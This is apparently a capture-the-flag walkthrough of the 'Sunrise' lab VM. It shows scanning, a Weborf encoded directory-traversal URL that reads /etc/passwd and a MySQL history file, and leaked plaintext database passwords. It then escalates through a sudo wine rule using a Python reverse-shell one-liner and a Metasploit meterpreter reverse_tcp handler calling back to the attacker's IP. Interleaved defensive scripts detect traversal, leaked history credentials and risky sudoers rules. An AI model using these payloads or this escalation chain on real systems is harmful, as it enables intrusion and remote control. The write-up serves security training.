
Sunrise-WALKTHROUGH

1. Host discovery

Using netdiscover, the target IP is found to be 192.168.203.140.

2. Port scanning

root@kali:~# nmap -sS -A 192.168.203.140 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-21 17:51 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.140
Host is up (0.00039s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp   open  http       Apache httpd 2.4.38
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /: Root directory w/ listing on 'apache/2.4.38 (debian)'
|_http-server-header: Apache/2.4.38 (Debian)
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=S%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=M%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=D%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|_    http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners: 
|   cpe:/a:apache:http_server:2.4.38: 
|     	CVE-2019-0211	7.2	https://vulners.com/cve/CVE-2019-0211
|     	CVE-2019-10082	6.4	https://vulners.com/cve/CVE-2019-10082
|     	CVE-2019-10097	6.0	https://vulners.com/cve/CVE-2019-10097
|     	CVE-2019-0217	6.0	https://vulners.com/cve/CVE-2019-0217
|     	CVE-2019-0215	6.0	https://vulners.com/cve/CVE-2019-0215
|     	CVE-2019-10098	5.8	https://vulners.com/cve/CVE-2019-10098
|     	CVE-2019-10081	5.0	https://vulners.com/cve/CVE-2019-10081
|     	CVE-2019-0220	5.0	https://vulners.com/cve/CVE-2019-0220
|     	CVE-2019-0196	5.0	https://vulners.com/cve/CVE-2019-0196
|     	CVE-2019-0197	4.9	https://vulners.com/cve/CVE-2019-0197
|_    	CVE-2019-10092	4.3	https://vulners.com/cve/CVE-2019-10092
3306/tcp open  mysql?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings: 
|   NULL: 
|_    Host '192.168.203.129' is not allowed to connect to this MariaDB server
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
8080/tcp open  http-proxy Weborf (GNU/Linux)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Page not found: Weborf (GNU/Linux)
|     Content-Length: 202
|     Content-Type: text/html
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 404</H1>Page not found <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
|   GetRequest: 
|     HTTP/1.1 200
|     Server: Weborf (GNU/Linux)
|     Content-Length: 326
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body><table><tr><td></td><td>Name</td><td>Size</td></tr><tr style="background-color: #DFDFDF;"><td>d</td><td><a href="html/">html/</a></td><td>-</td></tr>
|     </table><p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
|   HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 200
|     Server: Weborf (GNU/Linux)
|     Allow: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE
|     DAV: 1,2
|     DAV: <http://apache.org/dav/propset/fs/1>
|     MS-Author-Via: DAV
|   Socks5: 
|     HTTP/1.1 400 Bad request: Weborf (GNU/Linux)
|     Content-Length: 199
|     Content-Type: text/html
|_    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 400</H1>Bad request <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
| http-enum: 
|   /../../../../../../../../../../etc/passwd: Possible path traversal in URI
|   /../../../../../../../../../../boot.ini: Possible path traversal in URI
|_  /html/: Potentially interesting folder
|_http-server-header: Weborf (GNU/Linux)
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 00:0C:29:0F:49:BE (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.39 ms 192.168.203.140

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 193.33 seconds

I was wondering why this scan took so long; it turns out it found some remarkable things.

Open ports: 22, 80, 3306 and 8080.

3. Exploitation

Looking at port 80, it is just a plain directory listing.

Let's go straight to port 8080; according to the scan results it has an arbitrary file read.

http://192.168.203.140:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd

The slashes have to be URL-encoded here, otherwise it does not work.

We can see the file is read successfully.

This vulnerability is a directory traversal in Weborf.

Original article: http://www.gltc.cn/31328.html

In the /etc/passwd we read, we see the home directory of the user weborf, so we visit it:

http://192.168.203.140:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f
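The bypass above works because the literal ../ is rejected while ..%2f is decoded after the check. A detector therefore has to decode before it judges the path. The following access-log checker is an added example for this write-up, not Weborf code or the original author's; the log lines are constructed, and it also catches double-encoded sequences (%252e%252e%252f), which the post does not cover.

```python
"""Flag path-traversal requests in web access logs, decoding percent-encoding first so the
..%2f form used against Weborf above is caught alongside the literal ../ form.
Added example for this write-up; the log lines are constructed, not captured from the box."""
import re
from urllib.parse import unquote

# Constructed sample lines (combined-log style); only the request and status are parsed.
SAMPLE_LOG = """\
192.168.203.129 - - [21/Feb/2020:17:55:01 +0800] "GET /html/ HTTP/1.1" 200 326
192.168.203.129 - - [21/Feb/2020:17:55:09 +0800] "GET /..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1439
192.168.203.129 - - [21/Feb/2020:17:55:15 +0800] "GET /../../../../etc/passwd HTTP/1.1" 404 202
192.168.203.129 - - [21/Feb/2020:17:56:02 +0800] "GET /%252e%252e%252f%252e%252e%252fetc%252fshadow HTTP/1.1" 400 199
192.168.203.129 - - [21/Feb/2020:17:57:30 +0800] "GET /docs/..%2fREADME HTTP/1.1" 200 88
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def normalize(path: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so double-encoded sequences are exposed,
    then treat backslashes as separators, as a lenient server would."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")

def escapes_root(path: str) -> bool:
    """Walk the decoded path segment by segment; True if it ever climbs above the root.
    A plain substring match on '..' would also flag harmless paths such as /docs/../README."""
    depth = 0
    for part in path.split("/"):
        if part == "..":
            depth -= 1
            if depth < 0:
                return True
        elif part not in ("", "."):
            depth += 1
    return False

def find_traversal(log_text: str) -> list:
    """Return (status, raw_path, decoded_path) for every request that escapes the root.
    A 200 on such a request is the signal that the traversal actually succeeded."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        decoded = normalize(m.group("path"))
        if escapes_root(decoded):
            hits.append((m.group("status"), m.group("path"), decoded))
    return hits
```

Run over the sample, only the three requests that actually leave the document root are reported, and the one that returned 200 is the one worth an alert.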

Use dirb to scan the directory:

Sure enough, we find something good:

.mysql_history

It contains the database username and password:

show databases;
ALTER USER 'weborf'@'localhost' IDENTIFIED BY 'iheartrainbows44'; 
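The history file above leaked a password because the statement was typed with the secret inline and the file sat in a directory the web server could read. The following scanner is an added example for this write-up, not the original author's tooling: it looks for such lines in common history files, reports whether each file is world-readable, and redacts the value before reporting. The home directory it scans is a constructed fixture with a placeholder secret.

```python
"""Find credentials left in history files, like the ALTER USER statement recovered from
~weborf/.mysql_history above, and report whether the file is readable by other users.
Added example for this write-up; the home directory below is a constructed fixture."""
import os
import re
import stat
import tempfile

# History files that commonly end up holding secrets in a home directory.
HISTORY_FILES = (".mysql_history", ".bash_history", ".psql_history", ".python_history")

# Statements and commands that carry a password on the same line.
SECRET_PATTERNS = [
    re.compile(r"\bIDENTIFIED\s+BY\s+'", re.I),       # MySQL/MariaDB CREATE/ALTER USER
    re.compile(r"\bPASSWORD\s*\(\s*'", re.I),            # SET PASSWORD = PASSWORD('...')
    re.compile(r"(?:^|\s)mysql\b.*\s-p\S+", re.I),       # mysql -pSECRET on the command line
    re.compile(r"\b(?:passwd|password|token)=\S+", re.I),
]

def redact(line: str) -> str:
    """Mask every single-quoted value so a finding can be reported without echoing the secret."""
    return re.sub(r"'[^']*'", "'***'", line)

def scan_history(home: str) -> list:
    """Return (path, world_readable, redacted_line) for each suspicious history line."""
    findings = []
    for name in HISTORY_FILES:
        path = os.path.join(home, name)
        if not os.path.isfile(path):
            continue
        world_readable = bool(os.stat(path).st_mode & stat.S_IROTH)
        with open(path, errors="replace") as fh:
            for line in fh:
                line = line.rstrip("\n")
                if any(p.search(line) for p in SECRET_PATTERNS):
                    findings.append((path, world_readable, redact(line)))
    return findings

def make_sample_home() -> str:
    """Constructed fixture mirroring the write-up: a .mysql_history holding an ALTER USER."""
    home = tempfile.mkdtemp()
    path = os.path.join(home, ".mysql_history")
    with open(path, "w") as fh:
        fh.write("show databases;\n")
        fh.write("ALTER USER 'weborf'@'localhost' IDENTIFIED BY 'CONSTRUCTED_SECRET';\n")
    os.chmod(path, 0o644)   # readable by everyone, which is what let the traversal fetch it
    return home
```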

Try whether we can connect over SSH:

Going through the usual series of privilege-escalation checks, nothing exploitable turned up, so I finally chose to go into MySQL:

MariaDB [(none)]> show database;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'database' at line 1
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
3 rows in set (0.001 sec)

MariaDB [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [mysql]> show tables;
+---------------------------+
| Tables_in_mysql           |
+---------------------------+
| column_stats              |
| columns_priv              |
| db                        |
| event                     |
| func                      |
| general_log               |
| gtid_slave_pos            |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| index_stats               |
| innodb_index_stats        |
| innodb_table_stats        |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| roles_mapping             |
| servers                   |
| slow_log                  |
| table_stats               |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| transaction_registry      |
| user                      |
+---------------------------+
31 rows in set (0.001 sec)

MariaDB [mysql]> describe user;
+------------------------+-----------------------------------+------+-----+----------+-------+
| Field                  | Type                              | Null | Key | Default  | Extra |
+------------------------+-----------------------------------+------+-----+----------+-------+
| Host                   | char(60)                          | NO   | PRI |          |       |
| User                   | char(80)                          | NO   | PRI |          |       |
| Password               | char(41)                          | NO   |     |          |       |
| Select_priv            | enum('N','Y')                     | NO   |     | N        |       |
| Insert_priv            | enum('N','Y')                     | NO   |     | N        |       |
| Update_priv            | enum('N','Y')                     | NO   |     | N        |       |
| Delete_priv            | enum('N','Y')                     | NO   |     | N        |       |
| Create_priv            | enum('N','Y')                     | NO   |     | N        |       |
| Drop_priv              | enum('N','Y')                     | NO   |     | N        |       |
| Reload_priv            | enum('N','Y')                     | NO   |     | N        |       |
| Shutdown_priv          | enum('N','Y')                     | NO   |     | N        |       |
| Process_priv           | enum('N','Y')                     | NO   |     | N        |       |
| File_priv              | enum('N','Y')                     | NO   |     | N        |       |
| Grant_priv             | enum('N','Y')                     | NO   |     | N        |       |
| References_priv        | enum('N','Y')                     | NO   |     | N        |       |
| Index_priv             | enum('N','Y')                     | NO   |     | N        |       |
| Alter_priv             | enum('N','Y')                     | NO   |     | N        |       |
| Show_db_priv           | enum('N','Y')                     | NO   |     | N        |       |
| Super_priv             | enum('N','Y')                     | NO   |     | N        |       |
| Create_tmp_table_priv  | enum('N','Y')                     | NO   |     | N        |       |
| Lock_tables_priv       | enum('N','Y')                     | NO   |     | N        |       |
| Execute_priv           | enum('N','Y')                     | NO   |     | N        |       |
| Repl_slave_priv        | enum('N','Y')                     | NO   |     | N        |       |
| Repl_client_priv       | enum('N','Y')                     | NO   |     | N        |       |
| Create_view_priv       | enum('N','Y')                     | NO   |     | N        |       |
| Show_view_priv         | enum('N','Y')                     | NO   |     | N        |       |
| Create_routine_priv    | enum('N','Y')                     | NO   |     | N        |       |
| Alter_routine_priv     | enum('N','Y')                     | NO   |     | N        |       |
| Create_user_priv       | enum('N','Y')                     | NO   |     | N        |       |
| Event_priv             | enum('N','Y')                     | NO   |     | N        |       |
| Trigger_priv           | enum('N','Y')                     | NO   |     | N        |       |
| Create_tablespace_priv | enum('N','Y')                     | NO   |     | N        |       |
| Delete_history_priv    | enum('N','Y')                     | NO   |     | N        |       |
| ssl_type               | enum('','ANY','X509','SPECIFIED') | NO   |     |          |       |
| ssl_cipher             | blob                              | NO   |     | NULL     |       |
| x509_issuer            | blob                              | NO   |     | NULL     |       |
| x509_subject           | blob                              | NO   |     | NULL     |       |
| max_questions          | int(11) unsigned                  | NO   |     | 0        |       |
| max_updates            | int(11) unsigned                  | NO   |     | 0        |       |
| max_connections        | int(11) unsigned                  | NO   |     | 0        |       |
| max_user_connections   | int(11)                           | NO   |     | 0        |       |
| plugin                 | char(64)                          | NO   |     |          |       |
| authentication_string  | text                              | NO   |     | NULL     |       |
| password_expired       | enum('N','Y')                     | NO   |     | N        |       |
| is_role                | enum('N','Y')                     | NO   |     | N        |       |
| default_role           | char(80)                          | NO   |     |          |       |
| max_statement_time     | decimal(12,6)                     | NO   |     | 0.000000 |       |
+------------------------+-----------------------------------+------+-----+----------+-------+
47 rows in set (0.002 sec)

MariaDB [mysql]> select User,Password from user;
+---------+-------------------------------------------+
| User    | Password                                  |
+---------+-------------------------------------------+
| root    | *C7B6683EEB8FF8329D8390574FAA04DD04B87C58 |
| sunrise | thefutureissobrightigottawearshades       |
| weborf  | *A76018C6BB42E371FD7B71D2EC6447AE6E37DB28 |
+---------+-------------------------------------------+
3 rows in set (0.001 sec)

4. Privilege escalation

We got sunrise's username and plaintext password; root's password is encrypted and it is not yet clear what encryption it is, so let's log in with this account first and take a look.

Using sudo -l, we find this account can run wine with root privileges.
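A sudo rule on wine is as good as a rule on ALL, since wine's only purpose is to execute whatever it is handed. The audit below is an added example for this write-up, not the original author's code: it parses single-line sudoers rules and flags entries that grant root (or ALL) access to an unrestricted runtime, a wildcard, or ALL. The rule lines are constructed; the box's real sudoers is not shown in the post.

```python
"""Audit sudoers-style rules for entries that hand a user an arbitrary-code runtime as
root, which is exactly what sudo -l revealed for wine above.
Added example for this write-up; the rules below are constructed, not the box's sudoers."""
import re
import shlex

# Loaders/interpreters whose job is to execute whatever they are given: a root rule on
# one of these with no fixed arguments is equivalent to ALL (illustrative, not exhaustive).
RUNTIMES = {"wine", "wine64", "python", "python3", "perl", "ruby", "node", "bash", "sh", "env"}

# user host=(runas) [TAG:]... cmd[, cmd...]   (the common single-line sudoers form)
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

SAMPLE_SUDOERS = """\
# constructed sample
root    ALL=(ALL:ALL) ALL
sunrise ALL=(root) NOPASSWD: /usr/bin/wine
backup  ALL=(root) /usr/bin/rsync -a /srv/ /mnt/backup/
deploy  ALL=(www-data) /usr/bin/python3 /opt/app/reload.py
ops     ALL=(ALL) /usr/local/bin/*
"""

def audit(sudoers_text: str) -> list:
    """Return (user, reason, command) for each rule that amounts to arbitrary root execution."""
    findings = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = RULE_RE.match(line) if line else None
        if not m:
            continue
        runas = (m.group("runas") or "root").split(":")[0].strip()
        if runas not in ("root", "ALL"):
            continue                      # cannot become root through this rule
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            argv = shlex.split(cmd) if "*" not in cmd else []
            exe = argv[0].rsplit("/", 1)[-1] if argv else ""
            if cmd == "ALL" and m.group("who") != "root":
                reason = "ALL"
            elif "*" in cmd:
                reason = "wildcard"       # a glob lets the caller pick the binary or arguments
            elif exe in RUNTIMES and len(argv) == 1:
                reason = "runtime"        # runtime with no fixed script: runs anything
            else:
                reason = ""
            if reason:
                findings.append((m.group("who"), reason, cmd))
    return findings
```

The rsync rule with fixed arguments and the python3 rule that only runs as www-data are left alone; the wine rule and the wildcard are what a reviewer should see.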

About Wine:

Wine (a recursive acronym for "Wine Is Not an Emulator") is a compatibility layer that runs Windows applications on several POSIX-compliant operating systems such as Linux, Mac OSX and BSD.

This is easy to understand now: use wine to run a malicious exe and get a reverse shell. I originally wanted to package a Python script into an exe trojan with pyinstaller, but after converting my Python script to an exe it would not run properly:

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.203.129",1234));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/bash","-i"]);

I don't know what went wrong either; I hope someone who understands can explain it to me, thanks!


I'll just stick with msf.

You can see two files were generated: an exe and an .rc instructions file.

Let's look at the instructions first:

Configure msf according to the instructions and start the listener:

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.203.129
lhost => 192.168.203.129
msf5 exploit(multi/handler) > set lport 443
lport => 443
msf5 exploit(multi/handler) > set exitonsession false 
exitonsession => false
msf5 exploit(multi/handler) > set enablestageencoding true
enablestageencoding => true
msf5 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.203.129:443 

Next, transfer the exe trojan to the target machine.

Start a web server on Kali:

root@kali:~# python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...

We can see we now have root privileges.

 
